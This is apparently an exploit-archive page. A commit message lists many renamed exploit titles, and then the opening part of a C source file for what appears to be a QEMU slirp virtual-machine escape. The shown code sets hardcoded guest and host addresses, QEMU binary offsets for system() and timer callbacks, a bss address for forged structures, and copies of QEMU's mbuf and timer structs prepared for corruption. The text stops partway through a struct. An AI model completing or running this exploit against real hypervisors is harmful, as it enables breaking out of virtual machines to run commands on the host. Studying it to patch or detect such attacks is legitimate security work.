ccea007282
81 changes to exploits/shellcodes WordPress 2.9 - Denial of Service WordPress Core 2.9 - Denial of Service Qutecom SoftPhone 2.2.1 - Heap Overflow Crash (Denial of Service) PoC) Qutecom SoftPhone 2.2.1 - Heap Overflow Crash (Denial of Service) (PoC) IBM AIX 4.3.1 - 'adb' Denial of Service Jzip - Buffer Overflow (PoC) (SEH Unicode) Jzip - Buffer Overflow (PoC) (SEH Unicode) WordPress 4.0 - Denial of Service WordPress < 4.0.1 - Denial of Service WordPress Core 4.0 - Denial of Service WordPress Core < 4.0.1 - Denial of Service Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (PoC) (SEH Overwrite) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (PoC) (SEH Overwrite) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (PoC) (SEH Overwrite) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (PoC) (SEH Overwrite) Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service PHPFreeChat 1.7 - Denial of Service XenForo 2 - CSS Loader Denial of Service MikroTik 6.41.4 - FTP daemon Denial of Service (PoC) Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC) Wansview 1.0.2 - Denial of Service (PoC) StyleWriter 4 1.0 - Denial of Service (PoC) Any Sound Recorder 2.93 - Denial of Service (PoC) Snes9K 0.0.9z - Denial of Service (PoC) Virgin Media Hub 3.0 Router - Denial of Service (PoC) Intelbras IWR 3000N - Denial of Service (Remote Reboot) Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service (PoC) Windows PowerShell - Unsanitized Filename Command Execution Microsoft Windows PowerShell - Unsanitized Filename Command Execution QEMU - Denial of Service Counter-Strike Global Offensive 1.37.1.1 - 'vphysics.dll' Denial of Service (PoC) Windows Kernel - win32k.sys TTF Font Processing Pool Corruption in win32k!ulClearTypeFilter Windows Kernel - NULL Pointer Dereference in nt!MiOffsetToProtos While Parsing Malformed PE File Windows Kernel - Out-of-Bounds Read in CI!CipFixImageType While Parsing Malformed PE File Windows Kernel - Out-of-Bounds Read in nt!MiParseImageLoadConfig While Parsing Malformed PE File Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File Microsoft Windows Kernel - win32k.sys TTF Font Processing Pool Corruption in win32k!ulClearTypeFilter Microsoft Windows Kernel - NULL Pointer Dereference in nt!MiOffsetToProtos While Parsing Malformed PE File Microsoft Windows Kernel - Out-of-Bounds Read in CI!CipFixImageType While Parsing Malformed PE File Microsoft Windows Kernel - Out-of-Bounds Read in nt!MiParseImageLoadConfig While Parsing Malformed PE File Microsoft Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File Microsoft Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File Bematech Printer MP-4200 - Denial of Service Cisco WLC 2504 8.9 - Denial of Service (PoC) FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH) FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH) WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) Tautulli 2.1.9 - Denial of Service (Metasploit) Microtik SSH Daemon 6.44.3 - Denial of Service (PoC) TP-Link Archer C50 3 - Denial of Service (PoC) Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) Cisco IP Phone 11.7 - Denial of service (PoC) PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / disable_functions Bypass PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / disable_functions Bypass IBM AIX 4.3.1 - 'adb' Denial of Service Systrace 1.x (Linux Kernel x64) - Aware Local Privilege Escalation Systrace 1.x (Linux Kernel x64) - Aware Local Privilege Escalation Vm86 - Syscall Task Switch Kernel Panic (Denial of Service) / Privilege Escalation Vm86 - Syscall Task Switch Kernel Panic Denial of Service / Privilege Escalation Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow PoC Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow (PoC) AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC) Wansview 1.0.2 - Denial of Service (PoC) StyleWriter 4 1.0 - Denial of Service (PoC) Any Sound Recorder 2.93 - Denial of Service (PoC) Snes9K 0.0.9z - Denial of Service (PoC) Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit) Microsoft Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit) Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass Microsoft Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass Windows NTFS - Privileged File Access Enumeration Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) (Metasploit) Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit) Microsoft Windows NTFS - Privileged File Access Enumeration Microsoft Windows 10 - UAC Protection Bypass Via Microsoft Windows Store (WSReset.exe) (Metasploit) Microsoft Windows 10 - UAC Protection Bypass Via Microsoft Windows Store (WSReset.exe) and Registry (Metasploit) Counter-Strike Global Offensive 1.37.1.1 - 'vphysics.dll' Denial of Service (PoC) _GCafé 3.0 - 'gbClienService' Unquoted Service Path _GCafé 3.0 - 'gbClienService' Unquoted Service Path Wondershare Application Framework Service - _WsAppService_ Unquote Service Path Wondershare Application Framework Service - _WsAppService_ Unquote Service Path Windows - Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit) Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit) Microsoft Windows - Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit) Microsoft Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit) Bash 5.0 Patch 11 - SUID Priv Drop Exploit Bash 5.0 Patch 11 - SUID Priv Drop Exploit Windows - Shell COM Server Registrar Local Privilege Escalation Microsoft Windows - Shell COM Server Registrar Local Privilege Escalation Windows Kernel - Information Disclosure Microsoft Windows Kernel - Information Disclosure NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path Chilkat IMAP ActiveX 7.9 - File Execution / IE Denial of Service Chilkat IMAP ActiveX 7.9 - File Execution / Denial of Service Apache Tomcat 4.0.3 - Denial of Service 'Device Name' / Cross-Site Scripting WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit) WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit) WordPress 5.0.0 - Crop-image Shell Upload (Metasploit) WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit) Windows PowerShell ISE - Remote Code Execution Microsoft Windows PowerShell ISE - Remote Code Execution QEMU - Denial of Service Microtik SSH Daemon 6.44.3 - Denial of Service (PoC) WordPress 1.2 - HTTP Splitting WordPress Core 1.2 - HTTP Splitting WordPress 1.5.1.1 - SQL Injection WordPress Core 1.5.1.1 - SQL Injection WordPress 1.5.1.1 - 'add new admin' SQL Injection WordPress Core 1.5.1.1 - 'add new admin' SQL Injection WordPress 1.5.1.2 - 'xmlrpc' Interface SQL Injection WordPress Core 1.5.1.2 - 'xmlrpc' Interface SQL Injection WordPress 1.5.1.3 - Remote Code Execution WordPress 1.5.1.3 - Remote Code Execution (Metasploit) WordPress Core 1.5.1.3 - Remote Code Execution WordPress Core 1.5.1.3 - Remote Code Execution (Metasploit) WordPress 2.0.5 - Trackback UTF-7 SQL Injection WordPress Core 2.0.5 - Trackback UTF-7 SQL Injection WordPress 2.0.6 - 'wp-trackback.php' SQL Injection WordPress Core 2.0.6 - 'wp-trackback.php' SQL Injection WordPress 2.1.2 - 'xmlrpc' SQL Injection WordPress Core 2.1.2 - 'xmlrpc' SQL Injection WordPress 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing WordPress Core 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing WordPress 2.2 - 'xmlrpc.php' SQL Injection WordPress Core 2.2 - 'xmlrpc.php' SQL Injection WordPress 2.2 - 'wp-app.php' Arbitrary File Upload WordPress Core 2.2 - 'wp-app.php' Arbitrary File Upload WordPress 1.5.1.1 < 2.2.2 - Multiple Vulnerabilities WordPress Core 1.5.1.1 < 2.2.2 - Multiple Vulnerabilities WordPress 2.3.1 - Charset SQL Injection WordPress Core 2.3.1 - Charset SQL Injection Joomla! Component iJoomla News Portal 1.0 - 'itemID' SQL Injection Joomla! Component iJoomla! News Portal 1.0 - 'itemID' SQL Injection WordPress 2.6.1 - SQL Column Truncation WordPress Core 2.6.1 - SQL Column Truncation WordPress 2.6.1 - Admin Takeover (SQL Column Truncation) WordPress Core 2.6.1 - Admin Takeover (SQL Column Truncation) WordPress 2.8.1 - 'url' Cross-Site Scripting WordPress Core 2.8.1 - 'url' Cross-Site Scripting WordPress 2.8.3 - Remote Admin Reset Password WordPress Core 2.8.3 - Remote Admin Reset Password WordPress 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass WordPress < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution WordPress Core 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass WordPress Core < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution WordPress 2.9 - Failure to Restrict URL Access WordPress Core 2.9 - Failure to Restrict URL Access Joomla! Component Joomla Flickr 1.0 - Local File Inclusion Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion Joomla! Component Wap4Joomla - 'wapmain.php' SQL Injection Joomla! Component Wap4Joomla! - 'wapmain.php' SQL Injection Joomla! Component Minify4Joomla - Arbitrary File Upload / Persistent Cross-Site Scripting Joomla! Component Minify4Joomla! - Arbitrary File Upload / Persistent Cross-Site Scripting Joomla! Component iJoomla Magazine 3.0.1 - Remote File Inclusion Joomla! Component iJoomla! Magazine 3.0.1 - Remote File Inclusion WordPress 3.0.1 - 'do_trackbacks()' SQL Injection WordPress Core 3.0.1 - 'do_trackbacks()' SQL Injection WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 / NS8.1) WordPress Core 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 / NS8.1) WordPress 1.5.1.3 - 'cache_lastpostdate' Arbitrary Code Execution (Metasploit) WordPress Core 1.5.1.3 - 'cache_lastpostdate' Arbitrary Code Execution (Metasploit) WordPress 3.1.3 - SQL Injection WordPress Core 3.1.3 - SQL Injection WordPress 3.3.1 - Multiple Vulnerabilities WordPress Core 3.3.1 - Multiple Vulnerabilities WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities WordPress Core 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities Apache Tomcat 4.0.3 - Denial of Service 'Device Name' / Cross-Site Scripting WordPress 0.6/0.7 - 'Blog.header.php' SQL Injection WordPress Core 0.6/0.7 - 'Blog.header.php' SQL Injection WordPress 1.2 - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities WordPress 1.2 - 'admin-header.php?redirect_url' Cross-Site Scripting WordPress 1.2 - 'bookmarklet.php' Multiple Cross-Site Scripting Vulnerabilities WordPress 1.2 - 'categories.php?cat_ID' Cross-Site Scripting WordPress 1.2 - 'edit.php?s' Cross-Site Scripting WordPress 1.2 - 'edit-comments.php' Multiple Cross-Site Scripting Vulnerabilities WordPress Core 1.2 - 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities WordPress Core 1.2 - 'admin-header.php?redirect_url' Cross-Site Scripting WordPress Core 1.2 - 'bookmarklet.php' Multiple Cross-Site Scripting Vulnerabilities WordPress Core 1.2 - 'categories.php?cat_ID' Cross-Site Scripting WordPress Core 1.2 - 'edit.php?s' Cross-Site Scripting WordPress Core 1.2 - 'edit-comments.php' Multiple Cross-Site Scripting Vulnerabilities WordPress 1.2 - 'wp-login.php' HTTP Response Splitting WordPress Core 1.2 - 'wp-login.php' HTTP Response Splitting WordPress 1.2.1/1.2.2 - '/wp-admin/post.php?content' Cross-Site Scripting WordPress 1.2.1/1.2.2 - '/wp-admin/templates.php?file' Cross-Site Scripting WordPress 1.2.1/1.2.2 - 'link-add.php' Multiple Cross-Site Scripting Vulnerabilities WordPress 1.2.1/1.2.2 - 'link-categories.php?cat_id' Cross-Site Scripting WordPress 1.2.1/1.2.2 - 'link-manager.php' Multiple Cross-Site Scripting Vulnerabilities WordPress 1.2.1/1.2.2 - 'moderation.php?item_approved' Cross-Site Scripting WordPress Core 1.2.1/1.2.2 - '/wp-admin/post.php?content' Cross-Site Scripting WordPress Core 1.2.1/1.2.2 - '/wp-admin/templates.php?file' Cross-Site Scripting WordPress Core 1.2.1/1.2.2 - 'link-add.php' Multiple Cross-Site Scripting Vulnerabilities WordPress Core 1.2.1/1.2.2 - 'link-categories.php?cat_id' Cross-Site Scripting WordPress Core 1.2.1/1.2.2 - 'link-manager.php' Multiple Cross-Site Scripting Vulnerabilities WordPress Core 1.2.1/1.2.2 - 'moderation.php?item_approved' Cross-Site Scripting WordPress 1.5 - 'post.php' Cross-Site Scripting WordPress Core 1.5 - 'post.php' Cross-Site Scripting WordPress 2.0 - Comment Post HTML Injection WordPress Core 2.0 - Comment Post HTML Injection WordPress 2.0.5 - 'functions.php' Remote File Inclusion WordPress Core 2.0.5 - 'functions.php' Remote File Inclusion WordPress 1.x/2.0.x - 'template.php' HTML Injection WordPress Core 1.x/2.0.x - 'template.php' HTML Injection WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure WordPress Core 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure WordPress 2.1.1 - 'post.php' Cross-Site Scripting WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities WordPress Core 2.1.1 - 'post.php' Cross-Site Scripting WordPress Core 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities WordPress 1.x/2.0.x - 'Templates.php' Cross-Site Scripting WordPress Core 1.x/2.0.x - 'Templates.php' Cross-Site Scripting WordPress 2.1.1 - Arbitrary Command Execution WordPress 2.1.1 - '/wp-includes/theme.php?iz' Arbitrary Command Execution WordPress Core 2.1.1 - Arbitrary Command Execution WordPress Core 2.1.1 - '/wp-includes/theme.php?iz' Arbitrary Command Execution WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting WordPress Core < 2.1.2 - 'PHP_Self' Cross-Site Scripting WordPress 2.2 - 'Request_URI' Cross-Site Scripting WordPress Core 2.2 - 'Request_URI' Cross-Site Scripting WordPress 2.2.3 - '/wp-admin/page-new.php?popuptitle' Cross-Site Scripting WordPress Core 2.2.3 - '/wp-admin/page-new.php?popuptitle' Cross-Site Scripting WordPress 1.0.7 - 'Pool index.php' Cross-Site Scripting WordPress Core 1.0.7 - 'Pool index.php' Cross-Site Scripting WordPress 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities WordPress Core 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities WordPress 2.3 - 'Edit-Post-Rows.php' Cross-Site Scripting WordPress Core 2.3 - 'Edit-Post-Rows.php' Cross-Site Scripting WordPress 2.2.3 - '/wp-admin/post.php?popuptitle' Cross-Site Scripting WordPress Core 2.2.3 - '/wp-admin/post.php?popuptitle' Cross-Site Scripting WordPress 2.3.1 - Unauthorized Post Access WordPress Core 2.3.1 - Unauthorized Post Access WordPress 2.2.3 - '/wp-admin/edit.php?backup' Cross-Site Scripting WordPress Core 2.2.3 - '/wp-admin/edit.php?backup' Cross-Site Scripting WordPress 2.3.2 - '/wp-admin/users.php?inviteemail' Cross-Site Scripting WordPress 2.3.2 - '/wp-admin/invites.php?to' Cross-Site Scripting WordPress Core 2.3.2 - '/wp-admin/users.php?inviteemail' Cross-Site Scripting WordPress Core 2.3.2 - '/wp-admin/invites.php?to' Cross-Site Scripting WordPress 2.3.3 - 'cat' Directory Traversal WordPress Core 2.3.3 - 'cat' Directory Traversal WordPress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities WordPress Core 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities WordPress 4.2 - Persistent Cross-Site Scripting WordPress Core 4.2 - Persistent Cross-Site Scripting WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities WordPress Core 3.4.2 - Multiple Path Disclosure Vulnerabilities WordPress 3.4.2 - Cross-Site Request Forgery WordPress Core 3.4.2 - Cross-Site Request Forgery Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery WordPress Core 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery WordPress 4.5.3 - Directory Traversal / Denial of Service WordPress Core 4.5.3 - Directory Traversal / Denial of Service PHPFreeChat 1.7 - Denial of Service WordPress 4.7.0/4.7.1 - Content Injection (Python) WordPress 4.7.0/4.7.1 - Content Injection (Ruby) WordPress Core 4.7.0/4.7.1 - Content Injection (Python) WordPress Core 4.7.0/4.7.1 - Content Injection (Ruby) WordPress < 4.7.1 - Username Enumeration WordPress Core < 4.7.1 - Username Enumeration WordPress Multiple Plugins - Arbitrary File Upload Multiple WordPress Plugins - Arbitrary File Upload Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download WordPress Plugin Membership Simplified 1.58 - Arbitrary File Download Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal Joomla! Component Picture Calendar for Joomla! 3.1.4 - Directory Traversal Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection Joomla! Component Timetable Responsive Schedule For Joomla! 1.5 - 'alias' SQL Injection Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection Joomla! Component ccNewsletter 2.x.x 'id' - SQL Injection WordPress 4.6 - Remote Code Execution WordPress < 4.7.4 - Unauthorized Password Reset WordPress Core 4.6 - Remote Code Execution WordPress Core < 4.7.4 - Unauthorized Password Reset XenForo 2 - CSS Loader Denial of Service Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion WordPress Plugin Site Editor 1.1.1 - Local File Inclusion Joomla Component Fields - SQLi Remote Code Execution (Metasploit) Joomla! Component Fields - SQLi Remote Code Execution (Metasploit) Wordpress Plugin Activity Log 2.4.0 - Stored Cross-Site Scripting WordPress Plugin Activity Log 2.4.0 - Stored Cross-Site Scripting Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection) Joomla! Convert Forms version 2.0.3 - Formula Injection (CSV Injection) MikroTik 6.41.4 - FTP daemon Denial of Service PoC Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting WordPress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting Joomla Component Ek Rishta 2.10 - SQL Injection Joomla! Component Ek Rishta 2.10 - SQL Injection Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection WordPress Plugin Ninja Forms 3.3.13 - CSV Injection Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection Joomla! Component JCK Editor 6.4.4 - 'parent' SQL Injection Joomla Component eXtroForms 2.1.5 - 'filter_type_id' SQL Injection Joomla! Component eXtroForms 2.1.5 - 'filter_type_id' SQL Injection Virgin Media Hub 3.0 Router - Denial of Service (PoC) Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting WordPress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting WordPress CherryFramework Themes 3.1.4 - Backup File Download WordPress Theme CherryFramework 3.1.4 - Backup File Download WordPress Plugins Easy Testimonials 3.2 - Cross-Site Scripting WordPress Plugin Easy Testimonials 3.2 - Cross-Site Scripting Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation WordPress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation Wordpress Plugin Wisechat 2.6.3 - Reverse Tabnabbing WordPress Plugin Wisechat 2.6.3 - Reverse Tabnabbing Jenkins 2.150.2 - Remote Command Execution (Metasploit) Jenkins 2.150.2 - Remote Command Execution (Metasploit) Simple Online Hotel Reservation System - SQL Injection Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin) Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin) Simple Online Hotel Reservation System - SQL Injection Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin) Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin) phpBB 3.2.3 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution 60CycleCMS - 'news.php' SQL Injection 60CycleCMS - 'news.php' SQL Injection Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion Joomla! Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion Intelbras IWR 3000N - Denial of Service (Remote Reboot) Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting Centreon 19.04 - Remote Code Execution Centreon 19.04 - Remote Code Execution WordPress Add Mime Types Plugin 2.2.1 - Cross-Site Request Forgery WordPress Plugin Add Mime Types 2.2.1 - Cross-Site Request Forgery Wordpress Plugin Event Tickets 4.10.7.1 - CSV Injection WordPress Plugin Event Tickets 4.10.7.1 - CSV Injection WordPress 5.2.3 - Cross-Site Host Modification WordPress Core 5.2.3 - Cross-Site Host Modification Joomla 3.4.6 - 'configuration.php' Remote Code Execution Joomla! 3.4.6 - 'configuration.php' Remote Code Execution WordPress Arforms 3.7.1 - Directory Traversal WordPress Plugin Arforms 3.7.1 - Directory Traversal WordPress Plugin FooGallery 1.8.12 - Persistent Cross-Site Scripting WordPress Plugin Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting WordPress Plugin Popup Builder 3.49 - Persistent Cross-Site Scripting Restaurant Management System 1.0 - Remote Code Execution WordPress Plugin FooGallery 1.8.12 - Persistent Cross-Site Scripting WordPress Plugin Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting WordPress Plugin Popup Builder 3.49 - Persistent Cross-Site Scripting Restaurant Management System 1.0 - Remote Code Execution Joomla 3.9.13 - 'Host' Header Injection Joomla! 3.9.13 - 'Host' Header Injection Bematech Printer MP-4200 - Denial of Service Cisco WLC 2504 8.9 - Denial of Service (PoC) NopCommerce 4.2.0 - Privilege Escalation NopCommerce 4.2.0 - Privilege Escalation WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass WordPress Plugin Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass Online Book Store 1.0 - 'bookisbn' SQL Injection Huawei HG255 - Directory Traversal ( Metasploit ) Online Book Store 1.0 - 'bookisbn' SQL Injection Huawei HG255 - Directory Traversal (Metasploit) Tautulli 2.1.9 - Denial of Service ( Metasploit ) Wordpress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass WordPress Plugin InfiniteWP Client 1.9.4.5 - Authentication Bypass WordPress Plugin Time Capsule 1.21.16 - Authentication Bypass LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting WordPress InfiniteWP - Client Authentication Bypass (Metasploit) WordPress Plugin InfiniteWP - Client Authentication Bypass (Metasploit) Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting WordPress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting Cacti 1.2.8 - Authenticated Remote Code Execution Cacti 1.2.8 - Authenticated Remote Code Execution Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User) WordPress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User) Wordpress Plugin Search Meter 2.13.2 - CSV injection WordPress Plugin Search Meter 2.13.2 - CSV injection Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting WordPress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting TP-Link Archer C50 3 - Denial of Service (PoC) Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion WordPress Plugin Media Library Assistant 2.81 - Local File Inclusion Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution Cisco IP Phone 11.7 - Denial of service (PoC) Linux/ARM - Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes) Linux/ARM - Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes) Linux/x86 - Rabbit Encoder Shellcode (200 bytes) Linux/x86 - Rabbit Encoder Shellcode (200 bytes)
656 lines
No EOL
19 KiB
C
656 lines
No EOL
19 KiB
C
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
#include <stdio.h>
|
|
#include <errno.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <netinet/ip.h>
|
|
#include <net/ethernet.h>
|
|
#include <arpa/inet.h>
|
|
#include <linux/icmp.h>
|
|
#include <linux/if_packet.h>
|
|
#include <sys/ioctl.h>
|
|
#include <net/if.h>
|
|
#include <time.h>
|
|
|
|
|
|
#define die(x) do { \
|
|
perror(x); \
|
|
exit(EXIT_FAILURE); \
|
|
}while(0);
|
|
|
|
// * * * * * * * * * * * * * * * Constans * * * * * * * * * * * * * * * * * *
|
|
|
|
#define SRC_ADDR "10.0.2.15"
|
|
#define DST_ADDR "10.0.2.2"
|
|
|
|
#define INTERFACE "ens3"
|
|
|
|
#define ETH_HDRLEN 14 // Ethernet header length
|
|
#define IP4_HDRLEN 20 // IPv4 header length
|
|
#define ICMP_HDRLEN 8 // ICMP header length for echo request, excludes data
|
|
#define MIN_MTU 12000
|
|
|
|
// * * * * * * * * * * * * * * * QEMU Symbol offset * * * * * * * * * * * * * * * * * *
|
|
|
|
#define SYSTEM_PLT 0x029b290
|
|
#define QEMU_CLOCK 0x10e8200
|
|
#define QEMU_TIMER_NOTIFY_CB 0x2f4bff
|
|
#define MAIN_LOOP_TLG 0x10e81e0
|
|
#define CPU_UPDATE_STATE 0x488190
|
|
|
|
// Some place in bss which is not used to craft fake stucts
|
|
#define FAKE_STRUCT 0xf43360
|
|
|
|
// * * * * * * * * * * * * * * * QEMU Structs * * * * * * * * * * * * * * * * * *
|
|
|
|
struct mbuf {
|
|
struct mbuf *m_next; /* Linked list of mbufs */
|
|
struct mbuf *m_prev;
|
|
struct mbuf *m_nextpkt; /* Next packet in queue/record */
|
|
struct mbuf *m_prevpkt; /* Flags aren't used in the output queue */
|
|
int m_flags; /* Misc flags */
|
|
|
|
int m_size; /* Size of mbuf, from m_dat or m_ext */
|
|
struct socket *m_so;
|
|
|
|
char * m_data; /* Current location of data */
|
|
int m_len; /* Amount of data in this mbuf, from m_data */
|
|
|
|
void *slirp;
|
|
char resolution_requested;
|
|
u_int64_t expiration_date;
|
|
char *m_ext;
|
|
/* start of dynamic buffer area, must be last element */
|
|
char * m_dat;
|
|
};
|
|
|
|
|
|
struct QEMUTimer {
|
|
int64_t expire_time; /* in nanoseconds */
|
|
void *timer_list;
|
|
void *cb;
|
|
void *opaque;
|
|
void *next;
|
|
int scale;
|
|
};
|
|
|
|
|
|
struct QEMUTimerList {
|
|
void * clock;
|
|
char active_timers_lock[0x38];
|
|
struct QEMUTimer *active_timers;
|
|
struct QEMUTimerList *le_next; /* next element */ \
|
|
struct QEMUTimerList **le_prev; /* address of previous next element */ \
|
|
void *notify_cb;
|
|
void *notify_opaque;
|
|
|
|
/* lightweight method to mark the end of timerlist's running */
